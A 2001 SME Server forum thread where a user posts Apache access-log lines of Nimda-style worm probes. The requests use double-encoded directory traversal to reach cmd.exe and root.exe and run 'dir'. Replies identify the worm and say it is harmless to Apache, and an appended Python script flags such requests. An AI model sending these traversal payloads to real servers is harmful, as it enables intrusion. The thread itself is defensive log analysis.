Koozali.org: home of the SME Server

httpd/access entries

Gert Andersen

httpd/access entries
« on: November 27, 2001, 11:53:18 AM »
Hi

I have these entries in my access-log. Could someone please interpret these lines? I have a lot of these entries.
Thanks
--------------------------------------------------------------------
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:15 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:17 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:19 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"

-
-
-

WXP

Re: httpd/access entries
« Reply #1 on: November 27, 2001, 12:14:34 PM »
I can't help you much, but it seems like an IIS worm is trying to do some stuff :)

> GET /c/winnt/system32/cmd.exe?/c+dir

Don't worry, Apache is untouchable!

Cya

Jon Blakely

Re: httpd/access entries
« Reply #2 on: November 27, 2001, 12:38:28 PM »
It's the Nimda Worm. As WXP has said, it only affects unpatched Microsoft IIS servers.
Apart from being a waste of bandwidth and log space, it is harmless.

Jon
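
For triaging entries like the ones in this thread, here is an added example (not posted by anyone in the thread) that flags requests for cmd.exe or root.exe, undoes the double percent-encoding (%255c), and checks whether any probe got a non-error response. The log layout is assumed to match the entries above; the host name and client address in the sample are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Assumed layout, matching the entries in the thread:
# vhost client ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def decode_fully(path, max_rounds=3):
    """Percent-decode until stable; %255c needs two rounds to become a backslash."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return client, status and the reasons a request looks like an IIS probe."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    path, rounds = decode_fully(m["target"].split("?", 1)[0])
    norm = path.lower().replace("\\", "/")
    reasons = []
    if norm.endswith(("/cmd.exe", "/root.exe")):
        reasons.append("windows-shell")
    if "../" in norm:
        reasons.append("traversal")
    if rounds > 1:
        reasons.append("double-encoded")
    return {"client": m["client"], "status": int(m["status"]), "reasons": reasons}

def summarize(lines):
    """Count probes and collect any that did not get an error response."""
    hits = [h for h in map(classify, lines) if h and h["reasons"]]
    return len(hits), [h for h in hits if h["status"] < 400]

# Constructed sample: request paths from the thread, placeholder host and client.
PRE = "www.example.com 192.0.2.10 - - [27/Nov/2001:09:41:13 +0100] "
SAMPLE = [
    PRE + '"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"',
    PRE + '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    PRE + '"GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    probes, served = summarize(SAMPLE)
    print(f"{probes} probes, {len(served)} answered without an error")
```

An empty second value from summarize() means every probe was rejected, which is the situation the replies describe; any entry in that list is a request worth inspecting by hand.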